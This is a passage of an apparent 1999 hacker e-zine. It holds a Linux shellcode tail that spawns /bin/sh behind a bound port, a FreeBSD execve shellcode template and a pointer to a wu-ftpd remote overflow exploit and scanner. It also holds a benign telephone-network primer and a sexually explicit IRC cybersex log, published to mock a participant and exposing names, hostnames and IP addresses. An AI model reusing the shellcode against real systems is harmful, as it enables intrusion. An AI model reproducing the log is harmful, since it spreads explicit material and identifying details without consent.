movl %esi,%ebx
addb $0x20,%ebx /* %ebx now points to "/bin/sh" */
xorl %eax,%eax
movl %ebx,0x8(%ebx)
movb %al,0x7(%ebx)
movl %eax,0xc(%ebx)
movb $0xb,%al
leal 0x8(%ebx),%ecx
leal 0xc(%ebx),%edx
int $0x80
/* exit(0) */
xorl %eax,%eax
movl %eax,%ebx
incb %al
int $0x80
call:
call start
.ascii "abcdabcdabcd""abcdefghabcdefgh""abcd""/bin/sh"
-----------------------------------------------------
Once you have sent the exploit, you only need to connect to port 8960, and
you have an interactive shell.
----------------[ FreeBSD shellcode
Just in case all of that was all old hat to you, I'll take a little
foray into the world of BSD x86 shellcode. FreeBSD shellcode is in most
ways completely different. Primarily because syscalls are done by pushing
arguments onto the stack and using a far call. The syscall number
still goes in the %eax register however. OpenBSD is much the same but
it uses an interrupt for syscalls.
The main complication in writing shellcode for FreeBSD is in the far
call (instruction lcall 7,0) which contains 5 null bytes. Obviously
you would need to write some basic self-modifying shellcode. Since this is
going to be used in every syscall you make, its best to put this into a
mini-function and call it whenever necessary. I wrote a little template
for this, it's easy enough to make it execute a shell or bind to a port.
Just incase you're wondering the syscall for execve is 0x3b.
----fbsd.S----
.globl main
main:
jmp call
start:
/* Modify the ascii string so it becomes lcall 7,0 */
popl %esi
xorl %ebx,%ebx
movl %ebx,0x1(%esi) /* zeroed long word */
movb %bl,0x6(%esi) /* zeroed byte */
movl %esi,%ebx
addb $0x8,%bl /* ebx points to binsh */
jmp blah /* start the code */
call:
call start
syscall:
.ascii "\x9a\x01\x01\x01\x01\x07\x01" /* hidden lcall 7,0 */
ret
binsh:
.ascii "/bin/sh...."
blah:
/* put shellcode here */
call syscall
================================================================================
[The Telephone System/network part 1]
================================================================================
By - Pabell
THE TELEPHONE SYSTEM OR NETWORK
This paper was written mainly because of the lack of real information
kicking around on and off the net about phone systems and networks.
This is part one, of a two-part primer on phone systems. This is a
very introductory paper. I don't go into great detail, but cover the
basics and a first look at phone networks and systems.
If you really haven't been exposed to the telephony industry, this
paper, may be ominous. For the purpose of this paper I have broken
the telephone network into three basic components.
1. THE CENTRAL SWITCHING MACHINE
2. THE OUTSIDE PLANT FACILITIES
3. THE INSIDE PLANT FACILITIES
In this paper we will look at each of the three sections.
Section three the INSIDE PLANT FACILITIES will be covered in detail
throughout it. The CENTRAL SWITCHING MACHINE and the OUTSIDE PLANT
FACILITIES sections of the telephone network will be explained briefly
in general terms. Most of the parts of the telephone system or network
will already be familiar to you even without realizing it. You have a
phone of some description in your home or office, which is part of
the INSIDE PLANT FACILITIES section of the telephone network.
The INSIDE PLANT FACILITIES consists of all the cable, hardware,
telephone sets or equipment in the building or between buildings on
the same piece of property. The part of the network, which connects
buildings of various shapes and descriptions together, is called THE
OUTSIDE PLANT FACILITIES. Poles and associated wires are the only
type of outside plant distribution system in use today.
The remaining part you may not know about, or at least think you don't
know about, is the Central Switching Machine. The basic telephone circuit
is Two Wire Circuit, which connects every telephone set, through the
Outside Plant Facilities to a Central Switch. This two-wire circuit is
usually referred to as a "pair". One wire of the pair is referred to
as the TIP and the other wire is the RING.
THE CENTRAL SWITCHING MACHINE
The CENTRAL SWITCHING MACHINE is similar to the hub of a wheel where all
the individual two wire circuits or spokes are connected. This may sound
pretty complicated, but it really isn't. The central switch monitors
your telephone circuit and gives you a dial tone when you lift the
telephone set off the cradle. Taking a telephone handset off the
cradle is referred to as going "off-hook". Off-hook is a very common
phrase, and you will hear it in later parts of this paper.
When you dial, the Central Switch registers the digits dialed,
and identifies the circuit of the party you are trying to reach. The
Central Switch then connects your two-wire circuit to the party you dialed. The two telephone sets, which are connected together by the Central Switch, are referred to as the "calling" and "called" parties. The Central Switch the sends a ringing voltage
out to the called party, which rings the set bells to identify an incoming call.
When the called party goes off-hook, the Central Switch recognizes the
off-hook condition, and stops sending the ringing voltage, the two
parties then converse. When the calling party dials a number of a
telephone circuit which is already in use, or "busy", the Central
Switch recognizes the busy condition, and returns a busy tone to
the calling party.
So, as you can see, the Central Switch isn't really unfamiliar to you.
You have interacted with, and experienced many of the operations it
performs. There are many types of Central Switching Machines in use
throughout the telephone industry today. Each switch has it's advantages,
and features, however all systems provide the basic functions which were
briefly described.
To review, the main parts of the Telephone Network I have described so
far are:
1. THE CENTRAL SWITCHING MACHINE
2. THE OUTSIDE PLANT FACILITIES
3. THE INSIDE PLANT FACILITIES
Let's backtrack briefly to the Outside Plant Facilities section of the
network. Obviously, it would be too difficult to take each seperate
two-wire circuit, individually back to the Central Switch. Consequently,
numerous two wire circuits or pairs from a common area are bound together
in a common covering, or sheath. These groups of pairs enclosed by a common
sheath are referred to as cable. The actual number of pairs in a cable
or the size of cable can vary from one pair, to hundreds of pairs dependent
upon how many circuits the cable must service. As was mentioned previously,
all the cables servicing locations leave the Central Switch in different
directions according to the route, which will be the most cost effective,
and can effectively, service people in the area. The cables, which leave
the Central Switch, are very large, but as the cable goes along it is
continually decreasing in size, as smaller cables are dropped off at
locations where they are needed. The smaller cables branch out from the
main cables, and these cables again branch out to smaller cables until
every building and place is reached.
There are three basic types of outside plant facilities in use today, which connect the Central Switch, ultimately to your phone.
1. AERIAL CABLE
2. UNDERGROUND CABLE
3. FIBER OPTIC CABLE
Let's briefly look at each of the types of Outside Plant Facilities.
Aerial Cable
As the name aerial cable would indicate, the cable, and terminals are
supported above the ground on poles. The Aerial Cable distribution
system is probably the one you are most familiar with, since it was the
first system utilized across North America. The poles and wire are still
visible throughout this country today, and in many cases, is still the
most cost-effective method, where underground cabling is physically
impossible.
The diagram would be typical of a single line residential building
application of an Aerial Outside Plant System. You may see the term
"terminal" in the diagram. Terminals are simply access points placed at
convenient locations, on or between poles, along the cable route to permit
connections to selected pairs in the cable. For example, a cable
consisting of 100 pairs might have a terminal mounted on the pole to
allow a technician access to pairs 1-25. The next terminal would allow
access to pairs 24-40, and so on, until all the pairs have been used.
In this manner, the pair assigned to each building, at the Central Switch,
can be accessed at the closest terminal to that particular building.
The individual buildings aerial "drop wire" is then connected to the
pair in that terminal.
Underground Cable
The underground cable distribution system is very similar in design to the
aerial cable system. I consider underground cable to be both, DIRECT
BURIED CABLE and CABLE PLACED IN UNDERGROUND CONDUIT SYSTEMS.
As the title Direct Buried would indicate, the cable is placed into
the ground, with no protection other than the inherent protection
provided by the cable composition. Underground Conduit Systems
for cable, are used to provide an out of sight cable system and to
provide a means of adding to the existing cable as service demands
increase. Underground Conduit Systems also provide protection for
the cables since the cables are inside a pipe, which shields the cable.
The Underground Cable Distribution System is configured similarly to
the aerial cable, in that, cables leave a central point and continually
branch out to smaller cables until all the buildings etc. have been
accommodated.
The Underground System is connected to buildings in basically two ways.
PEDESTALS and ENCAPSULATION. Pedestals are simply terminals or access
points where building cabling can be connected to the cable from the
Central Switching Machine. There are many types, sizes, and shapes of
pedestals in use today.
The following diagram is a simplified depiction of the underground cable
(drop wire) from a building premise, which has been buried, to a pedestal
for connection.
Encapsulation is when the buildings drop wire is permanently spliced into
the underground distribution system. This system is preferred in
situations where the visible pedestals are not appropriate, or possible.
Fiber Optic Transmission Systems
In the aerial and underground cable distribution systems looked at
earlier, a pair of copper wires is used to carry the electrical signals
generated by the transmitting buildings phone, to the switching machine,
and then ultimately, to the receivers phone. The mouthpiece (transmitter)
of the telephone converts the acoustic voice message into corresponding
electrical signals. The electrical signals are passed onto the receiver's
earpiece (receiver) where they are converted back to the original
acoustic voice message.
In certain cases now, it is becoming uneconomical to provide a pair of
wires from every customer phone to the central switch. Transmitting speech
and information via glass fibers instead of the conventional copper wire
methods previously described is becoming increasingly popular in high
traffic areas. The term "Fiber Optics" or "FOTS" is becoming more and
more prevalent in the communication industry. "FOTS" is the short term
for Fiber Optics Transmission System.
The development of FOTS technology has been increasing dramatically in
recent years. The transmitting buildings phone still generates the same
electrical signals, but the signals are used to turn a light source on and
off. The light travels down the glass fibers where it is received and
converted back to electrical impulses, which are connected to the
receiving customers to wire copper pair.
To get a perspective of the comparison of a pair of copper wires to a pair
of glass fibers, consider the number of independent connections, which are
possible on each type of system.
* A pair of copper wires will provide two way communications for one conversation.
* A pair of glass fibers can provide up to 8000 independent connections.
The demands for more and more facilities to transmit and receive
information is increasingly rapid. The cost and limitations of
traditional means of linking areas together, is becoming more apparent.
The normal cable distribution systems in use throughout the telephone
industry employs combinations of underground, aerial, and FOTS
distribution systems, to provide the most cost efficient, and effective
means of providing service.
There is your basic introduction to the telephone network or system.
As my series of phone networks goes on I will go into greater detail
and explain some of its more complex issues and attributes.
Pabell
pabell@comtech.ab.ca
-------------------------------------------------------------------------------------------
<!b4b0!b4b0!b4b0!b4b0!> el8 wu-ftpd overflow, by cossack and smiler <!b4b0!b4b0!b4b0!b4b0!
-------------------------------------------------------------------------------------------
Check out /wu-ftpd/w00f.c
Also, check out /wu-ftpd/fscan.c for remote wu-ftpd buffer overflow scanner.
Scans for versions 12-18. Ph1x@b4b0.org.
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
[IRC LOGZ!@#$]
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
(kur4ck getting hiz sh33t on w1th muh w0men)
NOTE: He is actually whacking off during this session of cybersex on IRC.
IRC log started Tue Feb 23 15:18:14 1999
[asphxia(bg0124a@216.76.138.90)] 2640 country trace
[asphxia(bg0124a@216.76.138.90)] conyers ga
[asphxia(bg0124a@216.76.138.90)] 30013
[asphxia(bg0124a@216.76.138.90)] ok
[asphxia(bg0124a@216.76.138.90)] bree
[msg(asphixa)] HE hill mail u 5$s HEHim loaded
[rachel_(nobans@166-87-97.ipt.aol.com)] hahahaha
[msg(asphixia)] HE hill mail u 5$s HEHim loaded
<rachel_> ok
<rachel_> back
<rachel_> chrak
<rachel_> he loves the simpsons too
<rachel_> :\
[msg(asphxia)] im loaded HEH ill send u a 54 bill
[msg(rachel_)] HEH for 5$ she will cybersex me
[msg(rachel_)] im gonna log it
<rachel_> so youre more like him than u thought
<rachel_> :\
[msg(rachel_)] and
[msg(rachel_)] let gummo see it HEH!!
[rachel_(nobans@166-87-97.ipt.aol.com)] haha ummo wont believe u
[rachel_(nobans@166-87-97.ipt.aol.com)] er gummo
[msg(rachel_)] HEH
[msg(asphxia)] HEH ok today!?!?!!
[msg(asphxia)] HEH ??!?!!?
[msg(asphxia)] HEH u better not turn out to be a man HGHEH!
ùíù tip [tip@209.107.78.20] has joined #falon
<tip> yo yo yo yo
<chrak> yo
<tip> i'm gonna...
<tip> DANCE
ùíù tip [tip@209.107.78.20] has left #falon []
[msg(tip)] HEH im trying to get phone/cyber sex from phixes girlfriend HEH!!!
[asphxia(bg0124a@216.76.138.90)] i am not a man
[msg(tip)] she said if i mail her money she will so HEH.
[msg(asphxia)] HEH ok
[tip(tip@209.107.78.20)] HUH?
ð asphxia lays down naked on your bed
[msg(tip)] HEH shut up im getting laid
ùíù Starting conversation with asphxia
[tip(tip@209.107.78.20)] werd
[msg(asphxia)] heh ok
[msg(asphxia)] HEH hurry up im whacking off to pt0n HEH!!
ð asphxia starts to play with her clirt
[msg(asphxia)] pr0n!
[asphxia(bg0124a@216.76.138.90)] -r
[msg(asphxia)] HEH huh ?
[msg(asphxia)] well
[msg(asphxia)] lets hurry p im leavin in 40 minutes HEh and i wnna talk to someone on irc after u HEH!
[asphxia(bg0124a@216.76.138.90)] ok
[asphxia(bg0124a@216.76.138.90)] ok
ð asphxia starts to rub her clit harder
[msg(asphxia)] oHEH r u like fingering urself or some shit HEH ?
ð asphxia sucks on the head of your dick
ð asphxia puts her fingers in to her wet pussy
[msg(asphxia)] HEH ur not seriously doing that r u HEH ?
[msg(asphxia)] HEH ok
[msg(asphxia)] keep tyalking!! HEH
ð -> chrak/asphxia HEH me starts liek uNFIng u HH!
[msg(asphxia)] HEH!@!!
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| asphxia (bg0124a@216.76.138.90) (unknown)
³ ircname : bree
| channels : #atlantaga
³ server : irc.emory.edu ([170.140.4.6] Emory University)
[msg(asphxia)] HEH helloo HEH !!
[msg(asphxia)] u cant just start and stop HEH!!
[msg(asphxia)] it sux like that!!!
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak ][sean@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
[#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a]
[#falon ][@rachel_ ][nobans@166-87-97.ipt.aol.com ] [n/a]
[msg(rachel)] HEH omg
[msg(rachel_)] HEH omg
[msg(rachel_)] she stopped cybering me for no reason HEH!!
[msg(rachel_)] HEH
[msg(rachel_)] unless she is really doing the shit she is saying shes doing HEH!
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| chrak (sean@cpwright.com) (Internic Commercial)
³ ircname : Sean Harny
| channels : #b4b0 #dr00gz @#falon
³ server : irc.cs.cmu.edu (calloc(1,sizeof(geek)))
: idle : 0 hours 0 mins 39 secs (signon: Tue Feb 23 14:35:33 1999)
[ctcp(asphxia)] PING
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| asphxia (bg0124a@216.76.138.90) (unknown)
³ ircname : bree
| channels : #atlantaga
³ server : irc.emory.edu ([170.140.4.6] Emory University)
ùíù [#h] Bad channel key
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| asphxia (bg0124a@216.76.138.90) (unknown)
³ ircname : bree
| channels : #atlantaga
³ server : irc.emory.edu ([170.140.4.6] Emory University)
[ctcp(asphxia)] PING
<chrak> HEh her server is like dying or some shit HEH
[ctcp(asphxia)] PING
[ctcp(asphxia)] PING
[ctcp(#falon)] PING
ùíù Ignorance List:
[ 1] #b4b0: ALL
ùíù chrak [sean@cpwright.com] has joined #phrack
ùíù Topic for #phrack: shoe.
ùíù topic set by apropos [Tue Feb 23 01:04:13 1999]
ùíù [Users(#phrack:65)]
[ chrak ] [ fail ] [@hmf ] [ simpleton ] [ RedRasta ]
[@loadammo ] [ b0n3r ] [ gweeds ] [ fungus ] [ awr ]
[ [JFK] ] [ batz ] [ tyme ] [ ecx ] [ emoz ]
[ _jcd ] [@eb_ ] [@vis10n ] [ kaotik ] [ g00ey ]
[ F0uRier ] [ fiji ] [@angstrom ] [ Victoria ] [@sw1tchg0d ]
[ infecti0n ] [ spinux ] [ zach ] [@d-low ] [ cripto ]
[ interline ] [ dreck_ ] [@soyl3nt ] [@miph ] [@par ]
[@plaguez ] [@halflife ] [ yewdeepee ] [ shift4 ] [@ARP_H ]
[@b_ ] [ Kludge ] [@fah_ ] [@cain ] [ apathy ]
[@lanfear ] [ hi_ ] [ Neural_ ] [ thwack ] [ i87 ]
[@route ] [@apropos ] [@soylent ] [@bovine ] [@p-wInd0Wz ]
[@kamee ] [ neurostim ] [ krnl ] [ kweiheri ] [ meenk ]
[@ikol ] [@syke ] [ enr1que ] [@nihilis ] [ theclerk ]
ùíù [Users(#phrack:13)]
[@sirsyko ] [ falken ] [@rogerb ] [ snowman ] [ fx ]
[@felix ] [ nocarrier ] [ chris ] [@FrontLine ] [ gaius_ ]
[@kiad ] [@tmcm ] [@silitek ]
ùíù Channel #phrack was created at Sat Jul 18 08:25:57 1998
ùíù BitchX: Join to #phrack was synced in 0.292 secs!!
ùíù chrak [sean@cpwright.com] has left #phrack []
ùíù chrak [sean@cpwright.com] has joined #chat
ùíù Topic for #chat: le porc frangais indique que vous joindrez mes ligions
ùíù topic set by Chewbacca [Tue Feb 23 15:19:08 1999]
ùíù [Users(#chat:28)]
[ chrak ] [ zahr ] [ skibum1 ] [ RuFfrYdEr ] [ Luvman ]
[ billisray ] [ iibmoz ] [ FireLord ] [ uberpig ] [@PartyDr ]
[@ssmile ] [ Poisoned ] [ kasper ] [ Cochise ] [@Wildcard ]
[ Sigma2000 ] [@Gobo ] [@Porthos ] [ Zooj ] [@Fedaykin ]
[@Chewbacca ] [ `cat ] [ Hrunting ] [@shinsei ] [@Babylon ]
[@Athos ] [@Aramis ] [@Lao-Tzu ]
ùíù Channel #chat was created at Wed Feb 3 12:44:48 1999
ùíù BitchX: Join to #chat was synced in 0.176 secs!!
[msg(asphxia)] HEH
ùíù chrak [sean@cpwright.com] has left #chat []
ùíù Ignorance List:
[ 1] #b4b0: ALL
ùíù Connecting to port 6667 of server irc.prison.net [refnum 12]
!irc.prison.net Looking up your hostname...
!irc.prison.net Checking Ident
!irc.prison.net Got Ident response
!irc.prison.net Found your hostname
ùíù Your nick [chrak] is owned by sean@cpwright.com
ùíù BitchX: For more information about BitchX type /about
ùíù Welcome to the Internet Relay Network chrak_
ùíù Your host is irc.Prison.NET[irc], running version 2.8.21+RF+CSr30
ùíù This server was created Mon Nov 23 1998 at 10 29:13 PST
ùíù irc.Prison.NET 2.8.21+RF+CSr30 oiwsfcukbdl biklmnopstv
ùíù [local users on irc(796)] 2%
ùíù [global users on irc(5575)] 12%
ùíù [invisible users on irc(40720)] 88%
ùíù [ircops on irc(187)] 0%
ùíù [total users on irc(46295)]
ùíù [unknown connections(0)]
ùíù [total servers on irc(45)] (avg. 1028 users per server)
ùíù [total channels created(19156)] (avg. 2 users per channel)
ùíù [Highest client connection count(1452) (1451)]
ùíù Mode change [+iw] for user chrak_
ùíù Topic for #b4b0: r4lph has quit b4b0. I've massd'd the place to commemorate his fine service.
ùíù topic set by Stoner [Mon Feb 22 17:49:36 1999]
ùíù [Users(#b4b0:23)]
[ chrak_ ] [ raychel- ] [ Oroku ] [ MostHateD ] [ rachel_ ]
[ chrak ] [ Deads0u| ] [ m0f0 ] [ F0uRier ] [ ne0h ]
[ pahrohfit ] [ e- ] [ espionage ] [vz0rt ] [ zayten ]
[ bluetip ] [vb4b0 ] [ gb ] [ malloc- ] [ liquidhex ]
[ sadjester ] [ gob ] [ tip ]
ùíù chrak_ [~hmm@cpwright.com] has joined #dr00gz
ùíù [Users(#dr00gz:5)]
[ chrak_ ] [ chrak ] [@PHiNG ] [ liquidhex ] [@irrupt ]
ùíù chrak_ [~hmm@cpwright.com] has joined #falon
ùíù [Users(#falon:6)]
[ chrak_ ] [ raychel- ] [@rachel_ ] [@chrak ] [@Falon ]
[@liquidhex ]
ùíù Channel #b4b0 was created at Mon Jan 25 17:26:24 1999
ùíù BitchX: Join to #b4b0 was synced in 9.500 secs!!
ùíù Channel #dr00gz was created at Sun Feb 21 19:35:58 1999
ùíù BitchX: Join to #dr00gz was synced in 15.124 secs!!
ùíù Channel #falon was created at Tue Feb 23 07:24:25 1999
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak ][sean@cpwright.com ] [n/a]
[#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
[#falon ][@rachel_ ][nobans@166-87-97.ipt.aol.com ] [n/a]
[#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a]
ùíù BitchX: Join to #falon was synced in 21.486 secs!!
[msg(asphxia)] HEH ok
<raychel-> chrak it happened to me too :\
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| asphxia (bg0124a@216.76.138.90) (unknown)
³ ircname : bree
| channels : #atlantaga
³ server : irc.emory.edu ([170.140.4.6] Emory University)
<irrupt:#dr00gz> hey do0d
ùíù SignOff rachel_: #falon (Ping timeout: 240 seconds)
[msg(asphxia)] msg me plz HEH
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak ][sean@cpwright.com ] [n/a]
[#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
[#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a]
[#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a]
[msg(asphxia)] ok
[asphxia(bg0124a@216.76.138.90)] nm
[msg(asphxia)] hehe
[msg(asphxia)] heh
[asphxia(bg0124a@216.76.138.90)] deal is off
[msg(asphxia)] huh ??
[Falon(~Falon@x2-11.cosmoaccess.net)] hey
[msg(asphxia)] huh ?
[msg(asphxia)] HEH!!
[msg(asphxia)] why HEH ?
[msg(falon)] hi
ùíù Ending conversation with asphxia
<chrak_> OMG
<chrak_> she just said
<chrak_> 'deal is off'
<chrak_> fucking
[msg(asphxia)] HEH the server died HEH!!!!!
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak ][sean@cpwright.com ] [n/a]
[#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
[#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a]
[#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a]
<chrak_> fucki
<chrak_> ng
<raychel-> ahahaha
[msg(asphxia)] HEH damnbitch slut
ùíù You're not opped on #falon
<chrak_> EH
<chrak_> HEh
<chrak_> BAN asphxia
<chrak_> i dont need
[msg(asphixa)] HEH!!
asphixa: No such nick/channel
<chrak_> she said
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak ][sean@cpwright.com ] [n/a]
[#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
[#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a]
[#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a]
<chrak_> HEH
[msg(asphxia)] HEH
<chrak_> she said
<chrak_> she would cyber me and wastes like 20 mniutes of my tyime HEh
<chrak_> its not like its sex HEH!
<chrak_> where she haz a right to say no HEH.
<chrak_> if i agree that iz HEH
[asphxia(bg0124a@216.76.138.90)] hey
ð asphxia licks your inner thigh
[msg(asphxia)] HEH Werd up ?
<chrak_> HEh
<chrak_> ohh nm
<raychel-> hahah
<chrak_> she startsed agian
<chrak_> HEH
ùíù Starting conversation with asphxia
<raychel-> hehe ok
[msg(asphxia)] heh
ð -> chrak_/asphxia likes ur outer pussy lips HEH
[Falon(~Falon@x2-11.cosmoaccess.net)] hmm
[asphxia(bg0124a@216.76.138.90)] mmmmm
ð asphxia fingers her pussy
[Falon(~Falon@x2-11.cosmoaccess.net)] you are really strange
[asphxia(bg0124a@216.76.138.90)] mmmm
[msg(asphxia)] HEH r u really getting off HEH
[msg(asphxia)] HEH
<irrupt:#dr00gz> there
ð -> chrak_/asphxia resumes whacking off HEh continue talking plz HEH!
ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #Dr00gz
<irrupt:#dr00gz> got rid of a few potential hazards fer ya too
<ph1x:#Dr00gz> HEH!
<irrupt:#dr00gz> rpc. daemons
<irrupt:#dr00gz> erm
<irrupt:#dr00gz> wrong damn channel
<raychel-> i must go
<ph1x:#Dr00gz> I've done like 8 math assignments today BABY
<ph1x:#Dr00gz> HEH!
[msg(raychel-)] HEH by
<raychel-> bye!
[raychel-(nobans@171-170-154.ipt.aol.com)] bye :D
[raychel-(nobans@171-170-154.ipt.aol.com)] ill bbi like 30
[msg(asphxia)] HEH
[raychel-(nobans@171-170-154.ipt.aol.com)] i just hafta make a call LD
[raychel-(nobans@171-170-154.ipt.aol.com)] er :D
[msg(raychel-)] HEH ok damn asphxia sux at this shes slooooow typer HEH
[msg(asphxia)] HEH r u just
[msg(asphxia)] doing this
[raychel-(nobans@171-170-154.ipt.aol.com)] hahha
[raychel-(nobans@171-170-154.ipt.aol.com)] ok
[msg(asphxia)] to piss me off HEHEH!!
[msg(asphxia)] like
[msg(asphxia)] HEH.
[raychel-(nobans@171-170-154.ipt.aol.com)] later
ùíù SignOff raychel-: #falon (Giving in won't stop the noise.)
[msg(asphxia)] start making me whack off
[msg(asphxia)] then
[msg(asphxia)] stop
[msg(asphxia)] talking HEH!
[msg(asphxia)] HEH me
[msg(asphxia)] begins
[msg(asphxia)] to
ð asphxia strokes her pussy with one hand and your phat cock
[asphxia(bg0124a@216.76.138.90)] with the other
ùíù mode/#falon [+o chrak_] by Falon
ð -> chrak_/asphxia moans HEH
ð asphxia wants you to put your hand in her pussy
[asphxia(bg0124a@216.76.138.90)] shit ph1x is on
ð -> chrak_/asphxia puts his hand ALL the way up there HEH!
ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #falon
ð asphxia still wants you though
<ph1x> HEH!@#$
ð asphxia starts to get wet
[msg(asphxia)] HEH ok ignore him HEH!!
<ph1x> chrak
ùíù ph1x [sickmade@01-029.009.popsite.net] has left #falon []
[msg(ph1x)] wait like 5 minutes ok HEH ?
[ph1x(sickmade@01-029.009.popsite.net)] HEH
[ph1x(sickmade@01-029.009.popsite.net)] FOR WHAT?
[ph1x(sickmade@01-029.009.popsite.net)] HEH!
[ph1x(sickmade@01-029.009.popsite.net)] asphxia my women is on
[ph1x(sickmade@01-029.009.popsite.net)] HEH!
[msg(asphxia)] HEH jsut ms me shit HEH cause im whacking off
[ph1x(sickmade@01-029.009.popsite.net)] HEH!@#$
[ph1x(sickmade@01-029.009.popsite.net)] HEHAHHEHAH
[msg(asphxia)] HEH ph1x is here yes HEH hurry up HEH!
[msg(asphxia)] im looking at pr0n so it wont take long HEH if i hurry
ð asphxia licks the head of your dick
[asphxia(bg0124a@216.76.138.90)] mmmmmmm
[asphxia(bg0124a@216.76.138.90)] put it in me
ð -> chrak_/ashxia puts it in u
ashxia: No such nick/channel
ð -> chrak_/asphxia puts it in u
[asphxia(bg0124a@216.76.138.90)] mmm
ð asphxia squeals
[asphxia(bg0124a@216.76.138.90)] it feels sooo good
ð -> chrak_/asphxia IZ APPROCHING ORGASM FROM THIS STUPID EXCUSE FOR SEX HEH@!@A!@
ùíù NetSplit: irc-e.frontiernet.net split from irc.exodus.net [03:37pm]
ùíù BitchX: Press Ctrl-F to see who left Ctrl-E to change to [irc-e.frontiernet.net]
[asphxia(bg0124a@216.76.138.90)] mmmmmm
ð asphxia rides your big cock
[asphxia(bg0124a@216.76.138.90)] ohhh
[asphxia(bg0124a@216.76.138.90)] you feel how wet i am
[msg(asphxia)] HEH yep
ùíù SignOff ph1x: #dr00gz (Leaving)
[asphxia(bg0124a@216.76.138.90)] mmmmm]
ð asphxia purrs
[asphxia(bg0124a@216.76.138.90)] fuck me hard
[asphxia(bg0124a@216.76.138.90)] i want to feel you cum
[msg(asphxia)] heh i am HEH
[msg(asphxia)] im whacking off HEH!!!
[asphxia(bg0124a@216.76.138.90)] you are?
[msg(asphxia)] HEH YEP
[msg(asphxia)] well
[msg(asphxia)] ok
[msg(asphxia)] HEH
ð asphxia wants to feel you cum all inside her
[msg(asphxia)] im fucking u HEH!
[asphxia(bg0124a@216.76.138.90)] oooooh
[msg(asphxia)] EHEH ok her we go
[asphxia(bg0124a@216.76.138.90)] fuck me harder
ð asphxia squeals
ð asphxia turns over and inserts your cock into her tight ass
ùíù asphxia [bg0124a@216.76.138.90] has joined #dr00gz
[msg(asphxia)] hehe
[msg(asphxia)] ok im almost cumming HEH
<asphxia:#dr00gz> hiya
[msg(asphxia)] just type some more shit HEh
[msg(asphxia)] and say
[msg(asphxia)] 'ohh chrak HEH'
[msg(asphxia)] like moan it HEH!!!!
ùíù SignOff liquidhex: #dr00gz,#falon (Ping timeout)
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak_ ][~hmm@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
ùíù BitchX: Ambiguous command: F
[msg(asphxia)] f
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| asphxia (bg0124a@216.76.138.90) (unknown)
³ ircname : bree
| channels : #dr00gz
³ server : irc.emory.edu ([170.140.4.6] Emory University)
ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #falon
[asphxia(bg0124a@216.76.138.90)] ohhh crack HEH
ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #dr00gz
[asphxia(bg0124a@216.76.138.90)] fuck me harded
[msg(asphxia)] heh
[msg(asphxia)] ij
[asphxia(bg0124a@216.76.138.90)] your cock feels sooo good in my asss
[asphxia(bg0124a@216.76.138.90)] mmmm
<ph1x:#dr00gz> hmMmmmm
[msg(asphxia)] ur ass is about to get like
[msg(asphxia)] filled up with cum HEH@
[msg(asphxia)] !!
ð asphxia rubs her clit
[asphxia(bg0124a@216.76.138.90)] yum
ð asphxia cannot wait
[msg(asphxia)] HEH keep talikng im almost done HEH!!!
[msg(asphxia)] HEH keep talikng im almost done HEH!!!
[msg(asphxia)] HEH keep talikng im almost done HEH!!!
ð asphxia rides your phat cock
[asphxia(bg0124a@216.76.138.90)] mmmmm
[asphxia(bg0124a@216.76.138.90)] fuck me hard
ð asphxia puts a hand inside her hot pussy
[asphxia(bg0124a@216.76.138.90)] i want to feel you come
[msg(asphxia)] HEH
ð -> chrak_/asphxia pinching ur nipz HEH!@
[asphxia(bg0124a@216.76.138.90)] uuum
3:45pm up 4 days, 2:28, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
descende ttyp3 ron-ny13-22.ix.n 3:28pm 9:27 0.16s 0.16s -bash
